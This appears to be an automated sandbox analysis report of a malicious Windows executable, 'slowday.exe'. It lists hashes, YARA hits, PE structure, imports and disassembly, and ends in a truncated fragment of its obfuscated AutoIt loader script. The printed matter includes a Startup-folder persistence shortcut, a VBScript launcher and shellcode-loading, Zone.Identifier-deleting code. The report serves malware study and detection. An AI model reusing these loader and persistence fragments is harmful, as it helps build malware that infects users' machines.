                                                                                                                                                                                    SHA-512:47CDBC2D60408EC5EB23F1F58C7A11D1BB92B29978EB8E42A3994CA55A7424618BA31353208E50E3F507E59B060767344018DA3FA9D1771C1E4578F91D19BA05
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: URL_File_Local_EXE, Description: Detects an .url file that points to a local executable, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, Author: Florian Roth
                                                                                                                                                                                    • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
                                                                                                                                                                                    Preview:[InternetShortcut].URL=file:///C:\Users\user\AppData\Roaming\winlogons\winlogons.exe
                                                                                                                                                                                    Process:C:\Users\user\Desktop\slowday.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2010632
                                                                                                                                                                                    Entropy (8bit):5.999284931960796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:1C7E2FF84A8DA304070EC91B0FFC3051
                                                                                                                                                                                    SHA1:B5E7C2EFE4CDF7AE512F4F1019C87386E7297D97
                                                                                                                                                                                    SHA-256:22887A6408711F60A471787845A385030E039DE5D5929199212886097DB2B610
                                                                                                                                                                                    SHA-512:AA671AA28A394663D50904ED3B664BDE00038B765DAF7EB1EC4FD5C9B5983418300386C8AA7C402A038591CA906053460F7B48C7C0EE524A442C71EB2030A2DB
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...z..\..........".................J.............@.......................... ......2>....@...@.......@.....................L...|....p..l%......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...l%...p...&..................@..@.reloc..0q.......r...<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\slowday.exe
                                                                                                                                                                                    File Type:ASCII text, with CR line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):127
                                                                                                                                                                                    Entropy (8bit):4.848244463533217
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:15D4DD1FDB941819CD0A875B88758F0E
                                                                                                                                                                                    SHA1:D3473C83D39CB6DD96DDF534AB4037FF32E6136F
                                                                                                                                                                                    SHA-256:3F65EF50D30ADD441269973C0375B01CDF61C5B0656EFDE20A42EA7622398041
                                                                                                                                                                                    SHA-512:B699F52E3A0EB1908B326AEFB6AA5E2F62E116C9CD96D31DE4F3DE87F9E434EDB441D9D553D1C849D5D35E38B7BBE34C3700638D75D94D73C976281ED5FF228D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:Set WshShell = WScript.CreateObject("WScript.Shell") .WshShell.Run """C:\Users\user\AppData\Roaming\winlogons\winlogons.exe"""
                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Entropy (8bit):5.999273757037003
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:slowday.exe
File size:2010624
MD5:a172f4b0fa1a44cb60901944cff7f8ed
SHA1:c4aa87ba839c2da6ed852ba0e936ac80d47ec5b5
SHA256:94243b53eceb2662ae632d9c3e02b5b947ea56ac4ac1db3a69fc0ca3e5100816
SHA512:9b2fc878320be1f871b60fbb6dd1507237f3338a8cd5403bd603c37d685aaf9e275b142b1d9f139f1bcf8cbc2044cbea08575bbce159a6c6b3eaf8ee61972061
SSDEEP:24576:FCdxte/80jYLT3U1jfsWa5+hSDZsQ/6XQyS91TzPp5AffmQ:Mw80cTsjkWa5C
TLSH:A595C0D6A39D81E1CD1636F2BD2827835F7A59324A3470193F9A2D5C9E630B2412DFB3
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
Icon Hash:aab2e3e39383aa00
Entrypoint:0x427f4a
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp:0x5CA40D7A [Wed Apr 3 01:33:46 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007FDD086C8D2Dh
jmp 00007FDD086BBAF4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FDD086BBC7Ah
cmp edi, eax
jc 00007FDD086BBFDEh
bt dword ptr [004C31FCh], 01h
jnc 00007FDD086BBC79h
rep movsb
jmp 00007FDD086BBF8Ch
cmp ecx, 00000080h
jc 00007FDD086BBE44h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FDD086BBC80h
bt dword ptr [004BE324h], 01h
jc 00007FDD086BC150h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FDD086BBE1Dh
test edi, 00000003h
jne 00007FDD086BBE2Eh
test esi, 00000003h
jne 00007FDD086BBE0Dh
bt edi, 02h
jnc 00007FDD086BBC7Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FDD086BBC83h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FDD086BBCD5h
bt esi, 03h
Programming Language:
• [ C ] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [LNK] VS2013 UPD5 build 40629
• [ASM] VS2013 UPD5 build 40629
• [C++] VS2013 build 21005
• [ASM] VS2013 build 21005
• [RES] VS2013 build 21005
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x12256c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1ea000 | 0x7130 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dd2e | 0x8de00 | False | 0.572995250551 | data | 6.67587543996 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | False | 0.335334095528 | data | 5.76073164877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | False | 0.10175304878 | data | 1.19881067447 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xc7000 | 0x12256c | 0x122600 | False | 0.568714182899 | data | 4.37593958811 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1ea000 | 0x7130 | 0x7200 | False | 0.770353618421 | data | 6.78237732804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xc76e8 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc7810 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc7938 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc7a60 | 0x2e8 | data | English | Great Britain
RT_ICON | 0xc7d48 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc7e70 | 0xea8 | data | English | Great Britain
RT_ICON | 0xc8d18 | 0x8a8 | dBase III DBT, version number 0, next free block index 40 | English | Great Britain
RT_ICON | 0xc95c0 | 0x568 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc9b28 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | English | Great Britain
RT_ICON | 0xcc0d0 | 0x10a8 | data | English | Great Britain
RT_ICON | 0xcd178 | 0x468 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_MENU | 0xcd5e0 | 0x50 | data | English | Great Britain
RT_STRING | 0xcd630 | 0x594 | data | English | Great Britain
RT_STRING | 0xcdbc4 | 0x68a | data | English | Great Britain
RT_STRING | 0xce250 | 0x490 | data | English | Great Britain
RT_STRING | 0xce6e0 | 0x5fc | data | English | Great Britain
RT_STRING | 0xcecdc | 0x65c | data | English | Great Britain
RT_STRING | 0xcf338 | 0x466 | data | English | Great Britain
RT_STRING | 0xcf7a0 | 0x158 | data | English | Great Britain
RT_FONT | 0xcf8f8 | 0x374d4 | ASCII text, with very long lines, with no line terminators | |
RT_FONT | 0x106dcc | 0x374d4 | ASCII text, with very long lines, with no line terminators | |
RT_FONT | 0x13e2a0 | 0x374d4 | ASCII text, with very long lines, with no line terminators | |
RT_FONT | 0x175774 | 0x374d4 | ASCII text, with very long lines, with no line terminators | |
RT_FONT | 0x1acc48 | 0x374d2 | ASCII text, with very long lines, with no line terminators | |
RT_RCDATA | 0x1e411c | 0x4faa | data | |
RT_GROUP_ICON | 0x1e90c8 | 0x76 | data | English | Great Britain
RT_GROUP_ICON | 0x1e9140 | 0x14 | data | English | Great Britain
RT_GROUP_ICON | 0x1e9154 | 0x14 | data | English | Great Britain
RT_GROUP_ICON | 0x1e9168 | 0x14 | data | English | Great Britain
RT_MANIFEST | 0x1e917c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain
DLL  Import

WSOCK32.dll: WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect

VERSION.dll: GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW

WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW

COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create

MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W

WININET.dll: InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW

PSAPI.DLL: GetProcessMemoryInfo

IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho

USERENV.dll: DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW

UxTheme.dll: IsThemeActive

KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA

USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW

GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath

COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW

ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW

SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish

ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity

OLEAUT32.dll: LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system  Country where language is spoken  Map

English                         Great Britain

General

Code:
4294956061 7254 + 4294961279 - + 4294959295 + 3809 = 13047 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (6484 + 3906 + 6536 + + 4294961914 = 16163 6427 + 6647 + + 4294961339 - + 4294961204 + 2954 = + 4294962625 + 4294965132 + 4294967196 + + 4294964807 + 82 = 11544 ) LOCAL $DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CASE (6484 + 3906 + 6536 + + 4294961914 = 16163 6427 + 6647 + + 4294961339 - + 4294961204 + 2954 = + 4294962625 + 4294965132 + 4294967196 + + 4294964807 + 82 = 11544 ) LOCAL $DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) ENDSWITCH SWITCH 0 CASE (5711 + + 4294963353 + + 4294962146 = + 4294963914 + 4294965436 + 4294958765 + 4294962132 - + 4294965055 + 1278 = + 4294955260 + 4294962075 + 7500 + + 4294962591 = + 4294964870 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (6964 + 4294963467 - + 4294958801 - + 4294959639 = 19287 + 4294958834 + + 4294963702 + 6333 + 4294961781 = + 4294956058 5434 + 2459 - + 4294961225 = 13964 ) LOCAL $UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE = DLLSTRUCTCREATE ("byte shellcode[" & $OUBJOAAIMSDPJLUJMOJFFINL & "]" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS ) CASE (+ 4294962927 + 4294958951 - + 4294960909 + 4294963318 + 6073 = + 4294964710 2552 + + 4294961864 - + 4294965867 + 4294966161 = 937 6438 + 4294961795 = + 4294963064 ) LOCAL $XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD = DLLSTRUCTCREATE ("char[32]" ) CASE (5517 + + 4294964039 + + 4294961367 + 4294960173 + + 4294961351 = + 4294950559 4326 + + 4294958653 + 4294959696 + + 4294965596 = + 4294953679 2340 + 4294961016 = + 4294963356 ) DLLCALL ("kernel32.dll" , "bool" 
, "CloseHandle" , "handle" , $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW ["0" ] ) CASE (+ 4294962927 + 4294958951 - + 4294960909 + 4294963318 + 6073 = + 4294964710 2552 + + 4294961864 - + 4294965867 + 4294966161 = 937 6438 + 4294961795 = + 4294963064 ) LOCAL $XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD = DLLSTRUCTCREATE ("char[32]" ) CASE (+ 4294962927 + 4294958951 - + 4294960909 + 4294963318 + 6073 = + 4294964710 2552 + + 4294961864 - + 4294965867 + 4294966161 = 937 6438 + 4294961795 = + 4294963064 ) LOCAL $XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD = DLLSTRUCTCREATE ("char[32]" ) ENDSWITCH SWITCH 1 CASE (+ 4294965133 - + 4294959087 - + 4294962656 + + 4294961061 + + 4294967292 = 13168 7980 + 5188 = + 4294950167 + 4294961843 + + 4294962442 + + 4294960474 = 4447 ) FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) CASE (1866 - + 4294964454 + 4294966641 - + 4294959955 - + 4294967261 = 25822 1779 + 4245 + 3944 - + 4294958818 - + 4294959920 = 4997 + 4294966127 - + 4294960026 + 4294966562 + + 4294966926 = 11429 ) DLLSTRUCTSETDATA ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC , $I + "1" , $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) CASE (1871 + + 4294959389 - + 4294966284 + 3616 = + 4294965888 6682 + 8387 = 15069 + 4294966718 - + 4294961963 + + 4294962181 = + 4294966936 ) LOCAL $QHNKYCOISAZTOELZARDAOCMMASRG = DLLSTRUCTCREATE ("dword" ) CASE (+ 4294961651 + 4518 = 5364 + 4294967252 - + 4294966140 - + 4294963044 = + 4294959172 + 4294960997 - + 4294965695 + 4294963870 = + 4294966169 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (1871 + + 4294959389 - + 4294966284 + 3616 = + 4294965888 6682 + 8387 = 15069 + 4294966718 - + 4294961963 + + 4294962181 = + 4294966936 ) LOCAL $QHNKYCOISAZTOELZARDAOCMMASRG = DLLSTRUCTCREATE ("dword" ) CASE (1871 + + 4294959389 - + 4294966284 + 3616 = + 4294965888 6682 + 8387 = 15069 + 4294966718 - + 4294961963 + + 
4294962181 = + 4294966936 ) LOCAL $QHNKYCOISAZTOELZARDAOCMMASRG = DLLSTRUCTCREATE ("dword" ) ENDSWITCH LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] FOR $I = "0" TO "7" DLLSTRUCTSETDATA ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC , $I + "1" , $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) NEXT SWITCH 0 CASE (+ 4294959977 - + 4294963916 = + 4294963357 + 4294961920 + 6123 = 747 + 4294959997 + 630 + + 4294966151 + 4294966037 - + 4294962571 = + 4294962948 ) DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) CASE (+ 4294961158 + 2750 + 2114 + + 4294964693 = + 4294963419 5422 + 4807 = 10229 + 4294965925 + 4294961001 + 2689 + 8323 = 3346 ) FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) CASE (1678 - + 4294959755 - + 4294959354 - + 4294958476 = 9226 3104 + + 4294966859 - + 4294963763 + 3026 = 14099 7312 - + 4294962333 - + 4294967023 + 1551 = 25981 ) DLLSTRUCTSETDATA ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD , "1" , "CURRENT_USER" ) CASE (+ 4294960098 + 3745 + 8346 = 4893 + 4294967239 - + 4294962125 + + 4294960308 + 382 = + 4294965804 + 4294962734 + 4294958456 + + 4294960008 + + 4294959082 - + 4294964263 = + 4294941425 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) CASE (1678 - + 4294959755 - + 4294959354 - + 4294958476 = 9226 3104 + + 4294966859 - + 4294963763 + 3026 = 14099 7312 - + 4294962333 - + 4294967023 + 1551 